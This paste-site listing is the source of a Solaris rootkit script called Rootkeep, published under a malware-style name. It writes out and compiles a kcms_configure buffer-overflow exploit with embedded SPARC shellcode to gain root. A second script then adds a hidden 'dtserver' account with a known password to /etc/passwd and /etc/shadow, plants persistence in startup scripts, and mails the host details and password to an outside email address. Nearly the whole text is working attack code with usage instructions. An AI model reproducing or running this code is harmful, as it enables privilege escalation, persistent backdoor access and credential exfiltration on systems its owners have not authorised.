BlinkingStars

Backdoor.SunOS.Rkeep.a - Source Code

Jun 7th, 2023
  1. ################################################
  2. #
  3. # !/bin/sh
  4. # Rootkeep version *somefin_r33t_goes_here*
  5. # Gain root via kcms.. Follow instructions and
  6. # script will ensure an instant backdoor every
  7. # reboot. Fscking Solaris start-up scripts suck
  8. # Code for KCMS was chopped up by Shadow Penguin
  9. # Society
  10. # @rwxr--r-- #unixgods (efnet)
  11. #
  12. ################################################
  13.  
  14. cat > kcms.c << EOF
  15.  
  16. #define ENV         "NETPATH="
  17. #define MAXBUF      3000
  18. #define RETADR      2116
  19. #define RETOFS      0x1300
  20. #define EXPADR      1200
  21. #define FAKEADR1    2092
  22. #define FAKEADR2    2112
  23. #define NOP         0xa61cc013
  24.  
  25. char exploit_code[] =
  26. "\x82\x10\x20\x17\x91\xd0\x20\x08"
  27. "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  28. "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  29. "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  30. "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  31. "\x82\x10\x20\x3b\x91\xd4\xff\xff";
  32.  
  33. unsigned long get_sp(void)
  34. {
  35. __asm__("mov %sp,%i0 \n");
  36. }
  37.  
  38. main()
  39. {
  40.     char            buf[MAXBUF];
  41.     unsigned int    i,ip,sp;
  42.  
  43.     putenv("LANG=");
  44.     sp=get_sp();
  45.     printf("ESP =0x%x\n",sp);
  46.  
  47.     for (i=0;i<MAXBUF-4;i+=4){
  48.         buf[i+3]=NOP&0xff;
  49.         buf[i+2]=(NOP>>8)&0xff;
  50.         buf[i+1]=(NOP>>16)&0xff;
  51.         buf[i  ]=(NOP>>24)&0xff;
  52.     }
  53.  
  54.     ip=sp;
  55.     printf("FAKE=0x%x\n",sp);
  56.     buf[FAKEADR1+3]=ip&0xff;
  57.     buf[FAKEADR1+2]=(ip>>8)&0xff;
  58.     buf[FAKEADR1+1]=(ip>>16)&0xff;
  59.     buf[FAKEADR1  ]=(ip>>24)&0xff;
  60.     buf[FAKEADR2+3]=ip&0xff;
  61.     buf[FAKEADR2+2]=(ip>>8)&0xff;
  62.     buf[FAKEADR2+1]=(ip>>16)&0xff;
  63.     buf[FAKEADR2  ]=(ip>>24)&0xff;
  64.  
  65.     ip=sp-RETOFS;
  66.     printf("EIP =0x%x\n",sp);
  67.     buf[RETADR+3]=ip&0xff;
  68.     buf[RETADR+2]=(ip>>8)&0xff;
  69.     buf[RETADR+1]=(ip>>16)&0xff;
  70.     buf[RETADR]=(ip>>24)&0xff;
  71.  
  72.     strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));
  73.  
  74.     strncpy(buf,ENV,strlen(ENV));
  75.     buf[MAXBUF-1]=0;
  76.     putenv(buf);
  77.  
  78.     execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
  79. }
  80.  
  81. EOF
  82.  
  83. echo "Please wait"
  84. gcc kcms.c -o /usr/dt/examples/dtdnd
  85. chmod +x /usr/dt/examples/dtdnd
  86.  
  87. # This retains your root shell by piecing
  88. # echo'd predefined user and password into
  89. # separate Solaris start up scripts which
  90. # we all know are a nightmare...
  91.  
  92. cat > dtwsm << EOF
  93.  
  94. #!/bin/sh
  95. # rootkeep v.1
  96. # sil@antioffline.com
  97.  
  98. USER="dtserver:x:2012:2012::/usr/dt:/bin/sh"
  99. MAIL="intrusion@engineer.com"
  100. PATH=/usr/dt/examples
  101. FILE1=/etc/rc2.d/K40syslog
  102. FILE2=/usr/platform/sun4u/lib/flash-update.sh
  103. HOST=ifconfig -a
  104. PASS=/etc/passwd
  105. SHAD=/etc/shadow
  106. STRN="dtserver:uFBzOiICo3deU:11107:7:91:28:::"
  107. # string equates to p4$sW3rD
  108. WORD="p4$sW3rD"
  109. if test -n grep dtserver $PASS
  110.  
  111.     then echo $HOST is already backdoored >> /usr/dt/examples/dtinfo;
  112.     mail -s dtserver $MAIL < /usr/dt/examples/dtinfo;
  113. else
  114.  
  115.     echo $USER >> $PASS;
  116.     echo $STRN >> $SHAD;
  117.     mail -s dtserver MAIL < /usr/dt/examples/dtinfo
  118.  
  119. fi
  120.  
  121. if test -n grep $STRN $SHAD
  122.  
  123. then echo Password is set to $WORD | mail -s dtserver $MAIL
  124.  
  125. else
  126.     echo "echo dtserver:x:2012:2012::/usr/dt:/bin/sh" >> $FILE1;
  127.     echo "echo dtserver:uFBzOiICo3deU:11107:7:91:28:::" >> $FILE2;
  128.     mail -s dtsrm -f /usr/dt/example/dtd
  129.  
  130. fi
  131. EOF
  132.  
  133. chmod +x dtdnd
  134. mv dtdnd /usr/dt
  135. /usr/dt/examples/./dtdnd
  136.  
  137. echo "Now type /usr/dt/examples/./dtwsm and your set...."